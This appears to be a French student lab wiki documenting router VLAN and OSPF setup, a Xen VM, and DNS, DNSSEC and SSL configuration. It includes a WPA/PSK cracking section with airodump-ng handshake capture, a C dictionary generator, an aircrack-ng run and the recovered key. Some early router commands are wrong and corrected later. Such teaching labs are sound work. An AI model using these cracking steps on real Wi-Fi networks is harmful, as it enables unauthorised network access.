&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
